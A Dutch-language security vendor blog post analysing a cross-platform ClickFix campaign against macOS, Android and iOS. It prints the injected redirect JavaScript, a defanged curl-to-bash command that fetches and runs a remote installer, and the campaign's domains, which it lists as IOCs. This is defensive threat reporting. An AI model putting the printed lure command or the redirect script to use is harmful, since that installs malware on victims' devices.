Skip to main content
Blog
Attacks Blog

Meedogenloze aanvallen aan de clientzijde gericht op meerdere platforms met ClickFix

In dit artikel bespreken we een recente ClickFix-variant die zich nu richt op macOS, Android en iOS, met behulp van browsergebaseerde omleidingen, valse UI-prompts en zelfs drive-by-downloadtechnieken.

May 28, 2025 4 min read
ClickFix-aanval coverafbeelding

Wat begon als een op Windows gerichte social engineering-truc is uitgegroeid tot een bedreiging op meerdere platforms aan de clientzijde. In dit artikel bespreken we een recente ClickFix-variant die zich nu richt op macOS, Android en iOS, met behulp van browsergebaseerde omleidingen, valse UI-prompts en zelfs drive-by-downloadtechnieken.

Wat is een ClickFix-aanval?

ClickFix-aanvallen zijn niet nieuw. Mijn eerste ontmoeting met één was binnen September 2024:

Tweet

Een ClickFix-aanval is een vorm van gerichte social engineering of client-side aanval waarbij gebruik wordt gemaakt van het instinct van een gebruiker om ‘gewoon het probleem op te lossen’. Het begint meestal met een overtuigende boodschap die wijst op een vermeend probleem (zoals een beveiligingsprobleem of een repositoryprobleem). De gebruiker wordt aangespoord om op een link te klikken of een opdracht uit te voeren, in de overtuiging dat hij iets belangrijks oplost.

In dit aanvalsvoorbeeld wordt de gebruiker gevraagd een script in de terminal uit te voeren. Op Windows betekende dat PowerShell. Uiteraard werkt dezelfde techniek ook op macOS en Linux. En net als bij Windows ging ik ervan uit dat gebruikers er niet voor zouden trappen.

Aannames vormen echter een gevaarlijk spel in de cyberveiligheid, wat helaas maar weer eens werd bewezen.

Wij zijn cside en monitoren scriptaanvallen van derden aan de clientzijde en verbeteren de realtime bescherming aan de clientzijde voor websites en hun gebruikers. Alleen al in de afgelopen drie maanden hebben we meer dan waargenomen 300.000 gecompromitteerde websites.

Interessant genoeg is dit de tweede keer dat we het nieuws brengen over aanvallers die hun TTP's (Tactieken, technieken en procedures).

Maar wat ooit een bedreiging voor alleen Windows was, richt zich nu ook op andere besturingssystemen.

De aanval in detail

We hebben een waarschuwing ontvangen voor JavaScript gedownload van:

hxxps://idjhvn4m[.]pro?h=7bd350a4ed55a8faf2e45301d70d2&user=16

Het geleverde script:

(function () { var sitename = document.querySelector("meta[property='og:url']").getAttribute("content"); const mysite = new URL(sitename);const mysitename = `${mysite.protocol}//${mysite.hostname}`;var mytitle = document.querySelector("meta[property='og:title']").getAttribute("content"); var xtitle_spe = mytitle.replace(/[&\/\\#, +()$~%.'":*?<>{}]/g, '-'); var xtitle_spa = xtitle_spe.replace(/\s+/g, '-'); var oldurl = 'https://kbmljxm.com/?s={KEYWORD}&p=16'; var final_url_1 = oldurl.replace('{KEYWORD}', xtitle_spa);var final_url_2 = final_url_1.replace('{site}', mysitename); var id = 16; var successResponse = final_url_2; var elements = document.getElementsByClassName("buttonPress-"+16); for(var i = 0; i < elements.length; i++) {var anchor = elements[i];anchor.onclick = function() {window.open(successResponse, '_blank');}} })();

Dit JavaScript is niet erg onduidelijk, wat ongebruikelijk is bij dit soort aanvallen. Het creëert een klikhandler voor elementen met een specifieke klassenaam die een URL op een nieuw tabblad opent wanneer erop wordt geklikt. Dit is wat het doet:

  • Hiervoor is een sjabloon-URL nodig (hxxps://kbmljxm[.]com/?s={KEYWORD}&p=16)
  • Vervangt {KEYWORD} door de verwerkte paginatitel
  • Koppelt klikhandlers aan alle elementen met de klasseknopPress-16
  • Wanneer erop wordt geklikt, openen deze elementen de samengestelde URL op een nieuw tabblad

Hieronder vindt u de omleidingsketen:

Tabblad Netwerk met verzoek
JavaScript-code

Omleidingsketen op de gebruikersinterface

De pagina ziet eruit als een URL-verkorter en vraagt de gebruiker een link te kopiëren. De aanvallers maken misbruik van cutt[.]ly, een legitieme URL-verkorter.

Wanneer een gebruiker de verkorte URL in de browser plakt, wordt hij of zij doorgestuurd naar:

Deze nagebootste URL-verkorterpagina brengt de volgende pop-up:

“Plak de gekopieerde link in de adresregel van de browser.”

“Plak de gekopieerde link in de adresregel van de browser.”

Vervolgens wordt de gebruiker doorverwezen naar een downloadpagina (in dit geval voor macOS):

Vervolgens wordt de gebruiker doorverwezen naar een downloadpagina (in dit geval voor macOS):
/bin/bash -c "$(curl -fsSL hxxps://vuwzer[.]com/get/install.sh)"

De inhoud van dit shellbestand als volgt in deze screenshot: 

Dit shellscript downloadt vervolgens een macOS uitvoerbaar (gedetecteerd door 10 antivirus-engines op VirusTotal).

Android- en iOS-gedrag

Toen we dit op Android en iOS testten, verwachtten we een ClickFix-variant. Maar in plaats daarvan kwamen we een tegen drive-by-aanval.

Een drive-by-aanval is een soort cyberaanval waarbij kwaadaardige code wordt uitgevoerd of naar een apparaat wordt gedownload door simpelweg een gecompromitteerde of kwaadaardige webpagina te bezoeken. Geen klikken, installaties of interactie vereist.

De pagina heeft ons nu doorgestuurd naar:

hxxps://iteslawow[.]com/?=ijn&diu=16&sid=npT
Pagina 'Bestand is klaar om te downloaden' in mobiele browser

Deze site heeft een .tar-bestand gedownload - 7zip beveiligd met een wachtwoord - die de malware heeft uitgepakt en verwijderd (gedetecteerd door 5 AV-engines). En gedetecteerd door 5 leveranciers op VirusTotal.

Gedetecteerd door 5 leveranciers op VirusTotal.

VirusTotal score van 5

Zowel op Android als op Windows OS werd deze drive-by-aanvalsstijl gebruikt.

Dit is een fascinerende en evoluerende aanval die laat zien hoe aanvallers hun bereik vergroten. Wat begon als een Windows-specifieke ClickFix-campagne richt zich nu op macOS, Android en iOS. Aanzienlijke uitbreiding van de schaal van de operatie.

Het is opnieuw een herinnering aan de enorme verspreiding van aanvallen aan de clientzijde, en de verschillende vormen die deze kunnen aannemen, allemaal door misbruik te maken van het vertrouwen dat gebruikers stellen in browserinteracties wanneer de beveiliging aan de clientzijde ontbreekt of slecht wordt afgedwongen.

Himanshu Anand
Software Engineer Himanshu Anand

I'm a software engineer and security analyst.

FAQ

Frequently Asked Questions

Een ClickFix-aanval is een social engineering-techniek die het instinct van een gebruiker misbruikt om "het probleem gewoon op te lossen". De aanvaller toont een nepfout of -waarschuwing (beveiligingsmelding, repositoryprobleem, systeembericht) en instrueert de gebruiker om een terminalcommando uit te voeren, code in een browserconsole te plakken of op een kwaadaardige link te klikken. De gebruiker denkt een probleem op te lossen, maar voert in feite de payload van de aanvaller uit.

Ja. ClickFix begon op Windows met PowerShell-prompts, maar cside heeft actieve campagnes waargenomen gericht op macOS (downloaden van shell-scripts die macOS-uitvoerbare bestanden ophalen), Android en iOS (drive-by downloads met met een wachtwoord beveiligde .tar-bestanden). De cross-platform variant gebruikt browsergebaseerde omleidingen en valse UI-prompts in plaats van OS-specifieke tooling.

De campagne die in dit artikel wordt geanalyseerd gebruikte `idjhvn4m[.]pro` als initiële JavaScript-leveringshost, `kbmljxm[.]com` als omleidings-tussenpersoon en `iteslawow[.]com` voor de drive-by payload op Android en iOS. De payloads in de eindfase werden gemarkeerd door 5–10 antivirus-engines op VirusTotal. Verdedigers moeten deze domeinen als IOC's behandelen en hun egress-logs controleren op overeenkomsten.

Client-side runtime-monitoring is vereist. Het kwaadaardige gedrag vindt plaats nadat de pagina is geladen, vaak alleen voor een deelverzameling bezoekers op basis van geografie, apparaat of referrer. Statische scanners missen deze payloads omdat aanvallers de scanners detecteren en schone inhoud serveren. cside legt het werkelijke script vast dat elke gebruiker ontvangt en gebruikt LLM-geassisteerde detectie om omleidingen, valse prompts en OS-gerichte downloadstromen te markeren.

Het is een directe evolutie. De ontmoeting van september 2024 waarnaar in het artikel wordt verwezen, documenteerde de eerste variant op Windows. De hier beschreven campagne hergebruikt hetzelfde social-engineering patroon, maar breidt de lijst met doel-besturingssystemen uit en schakelt over van een Windows-only uitvoeringsstroom naar een multi-OS leveringsmechanisme met nieuwe infrastructuur.

Monitor en Beveilig Je Third-Party Scripts

Gain full visibility and control over every script delivered to your users to enhance site security and performance.

Start gratis, of probeer Business met een proefperiode van 14 dagen.

cside dashboard interface met script monitoring en beveiligingsanalytics
Related Articles
Boek een demo